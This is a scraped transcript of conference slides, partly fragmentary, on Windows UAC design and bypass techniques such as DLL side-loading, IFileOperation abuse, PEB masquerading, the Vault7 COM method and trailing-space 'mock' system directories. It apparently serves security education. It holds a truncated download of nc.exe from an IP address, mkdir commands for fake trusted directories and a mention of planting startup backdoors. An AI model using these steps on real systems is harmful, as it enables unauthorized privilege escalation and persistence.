SITCON: Playing Win32 Like a K!NG ;)

Transcript

1. 2020 (New-Object System.Net.WebClient).Dow /10.10.10.10/nc.exe","nc.ex PS C:\> [System.Convert]::ToBase64Strin ext.Encoding]::UTF8.Ge 414141414141414141 AAAAAAAAAA

   SITCON cmd.exe /c "d Playing Win32 Like a K!NG ;) [email protected]

2. #Windows #Reversing #Pwn #Exploit $man • Master degree at CSIE,

   NTUST • Security Researcher - chrO.ot • Speaker - BlackHat, DEFCON, VXCON, HITCON • [email protected] • Hao's Arsenal

3. [email protected] 1. UAC Design 2. Exploit Attacks 1. Misc Method

   2. CIA Vault7: Elevated COM Object Method 3. UAC Bypass by Mocking Trusted Directories 3. Recap /?outline

4. [email protected] 〉〉〉UAC Design

5. [email protected] /?UAC

6. [email protected] /?UAC

7. syscall Ring0 Ring3 Explorer (A.) RunAs UAC Service (B.) Send

   a task by RPC message to UAC service for creating a different privilege child process RPC trust_authA consent.exe privileged child process trust_authB

8. [email protected] • TrustAuth_A # trust path verify - $p =

   ToDosName("C:\\a.exe") # \??\C:\a.exe - $p.startswith(\??\C:\Windows\System32) or $p.startswith(\??\C:\Windows\SysWoW64) - deny-list /?auth_a

9. [email protected] • TrustAuth_B - whitelisted *.exe with M$ signature -

   or AutoElevate marked as TRUE in manifest.xml /?auth_b

10. [email protected] /?Bypass • UAC: 朕不給的，你拿不⾛！ • TrustAuth_A # binary from

    the trusted zone? A. launched from the system directory B. whitelisted + signed by M$ • TrustAuth_B # should be elevated? C. marked as auto-elevated or whitelisted PS C:> sigcheck.exe -m C:\Windows\System32\Taskmgr.exe 所以現在... 我們有⼀份 好棒棒⽬標名單

11. [email protected] • Misc: 在野奇技淫巧系列✨ • CIA: Elevated COM Object Method

    • Mocking Trusted Directories /?attack

12. [email protected] /?misc#1 Accessing Access Tokens for UIAccess www.tiraniddo.dev/2019/02/accessing-access-tokens-for-uiaccess.html 幫你⾃動按確定︖ 舉⼿之勞啦

13. [email protected] /?misc#2 • 那我們能讓⾼權服務直接呼叫我們嗎 • Bypassing UAC on Windows10 using

    Disk Cleanup enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup

14. [email protected] /?misc#3 • 解壓縮直接把系統程式檔案蓋掉 $ wusa hack.cab /extract: C:\windows\system32 msitpros.com/?p=3100

15. [email protected] 〉〉〉IFileOperation

16. [email protected] /?RunAs consent.exe

17. [email protected] /?fileCopy

18. [email protected] /?alert

19. [email protected] 'PE' Opt Header .text .EntryPoint .ImageBase Section Data .rdata

    .idata a.exe Process PEB PE Module ntdll.dll VERSION.dll user32.dll ... LoadLibrary() $PATH: { "C:\hijack\VERSION.dll", "C:\Windows\System32\VERSION.dll", "C:\Windows\SysWoW64\VERSION.dll", ... } C:\hijack\a.exe /?hijack

20. [email protected] • DLL Side-Loading → to hijack auto-elevated windows services

    by drop a malicious *.dll binary • IFileOperation → file arbitrary writing if you're Explorer → drop *.dll into C:\windows\system32 to hijack • DLL Injection → do things as Explorer https://github.com/hjc4869/UacBypass /?bypass#1

21. malware system32\cliconfg.exe /?bypass#1 explorer.exe Process ntdll.dll kernel32.dll user32.dll malware.dll (a.)

    inject *.dll module (b.) create a new thread to wake malware up (c.) drop a *.dll into %system32% to hijack service (d.) get privileged by dll hijack

22. [email protected] • 更動 Windows 註冊序號 →駭客可以幫你安裝正版的 Windows！ • 執⾏磁碟管理⼯具 →電腦跑很慢電腦垃圾太多︖駭客幫你磁碟重整⼀下

    • 幫你移除防毒軟體 →覺得防毒讓電腦跑很慢︖沒關係駭客幫你刪掉 (⁎⁍̴̛ᴗ⁍̴̛⁎) • 寫入開機啟動項 →駭客可以植入開機⾃動執⾏的後⾨ watch after you ;) /?bypass4what

23. [email protected] 'PE' Opt Header .text .EntryPoint .ImageBase Section Data .rdata

    .idata Source.cpp Compiler 'MZ' Opt Header ImageBase .text .rdata .idata Process Application Loader EntryPoint PEB "C:\Windows\explorer.exe" PE Module /?MasqueradePEB

24. [email protected] • DLL Side-Loading → to hijack auto-elevated windows services

    by drop a malicious *.dll binary • IFileOperation + MasqueradePEB → file arbitrary writing as Explorer → drop *.dll into C:\windows\system32 to hijack /?bypass#2

25. malware system32\cliconfg.exe /?bypass#1 explorer.exe Process ntdll.dll kernel32.dll user32.dll malware.dll (a.)

    inject *.dll module (b.) create a new thread to wake malware up (c.) drop a *.dll into %system32% to hijack service (d.) get privileged by dll hijack

26. system32\cliconfg.exe /?bypass#2 malware.exe Process ntdll.dll kernel32.dll user32.dll (a.) Masquerade current

    path as explorer.exe (b.) drop a *.dll into %system32% to hijack service (c.) get privileged by dll hijack PEB "C:\Windows\explorer.exe"

27. [email protected] Vault 7: CIA Hacking Tools Revealed /?WikiLeaks wikileaks.org/ciav7p1/cms/page_3375231.html

28. [email protected] /?IFileOperation http://d1iv3.me/2017/08/11/Bypass-UAC-⽅法研究/

29. [email protected] /?IFileOperation http://d1iv3.me/2017/08/11/Bypass-UAC-⽅法研究/

30. [email protected] /?IFileOperation http://d1iv3.me/2017/08/11/Bypass-UAC-⽅法研究/

31. [email protected] Vault 7: CIA Hacking Tools Revealed /?WikiLeaks wikileaks.org/ciav7p1/cms/page_3375231.html M$

    patched this vulnerability after Win10 version 1607 (include known *.dll lead to hijack)

32. [email protected] Vault 7: CIA Hacking Tools Revealed /?WikiLeaks wikileaks.org/ciav7p1/cms/page_3375231.html M$

    patched this vulnerability after Win10 version 1607 (include known *.dll lead to hijack)

33. [email protected] 〉〉〉Mocking Directory

34. syscall Ring0 Ring3 Explorer (A.) RunAs UAC Service (B.) Send

    a task by RPC message to UAC service for creating a different privilege child process RPC trust_authA consent.exe privileged child process trust_authB

35. [email protected] /?Bypass • UAC: 朕不給的，你拿不⾛！ • TrustAuth_A # binary from

    the trusted zone? A. launched from the system directory B. whitelisted + signed by M$ • TrustAuth_B # should be elevated? C. marked as auto-elevated or whitelisted PS C:> sigcheck.exe -m C:\Windows\System32\Taskmgr.exe 所以現在... 我們有⼀份 好棒棒⽬標名單

36. [email protected] /?DACL

37. [email protected] /?DACL

38. [email protected] $ mkdir "C:\Windows \" $ mkdir "C:\Windows \System32" /?DACL

39. [email protected] • TrustAuth_A # trust path verify - $p =

    ToDosName("C:\\a.exe") # \??\C:\a.exe - $p.startswith(\??\C:\Windows\System32) or $p.startswith(\??\C:\Windows\SysWoW64) - deny-list /?auth_a

40. [email protected] RtlDosPathNameToRelativeNtPathName_U_WithStatus( GetLongPathNameW(L"C:\Windows \System32\a.exe") ) RtlDosPathNameToRelativeNtPathName_U_WithStatus( L"C:\Windows\System32\a.exe" ) $p =

    L"\??\C:\Windows\System32\a.exe" /?auth_a AiLaunchProcess(L"C:\Windows \System32\a.exe")

41. [email protected] • TrustAuth_A - Path Normalization Issues • TrustAuth_B -

    Whitelisted EXE Files with Trusted Signature - AutoElevated Marked EXE Files → DLL Side-Loading Tricks to hijack windows services • UAC Bypass by Mocking Trusted Directories /?attack

42. [email protected] 〉〉〉Recap

43. [email protected] /?HITCON www.youtube.com/watch?v=6LUo-Crd9pc

44. [email protected] • UAC Design - auth_a: *.exe launched from the

    system - auth_b: marked as AutoElevated • Bypass Tricks - Issue: IFileOperation, Path Normalization - DLL Side-Loading - Code Inject / MasqueradePEB - DEFCON 25: UAC 0day, all day! by @FuzzySec /?recap

45. [email protected] /?HITCON

46. 萬 ⽤ 劫 持 本 地 提 权 情報滲透 越

    級 注 入 PS C:\> [System.Convert]::ToBase64String([Sy ext.Encoding]::UTF8.GetByte cmd.exe /c "dir" 414141414141414141 AAAAAAAAAAAAAAAAAAAAAA [email protected] 遠程後⾨ 網軍⾏動 Thanks! Slide Github @aaaddress1 Facebook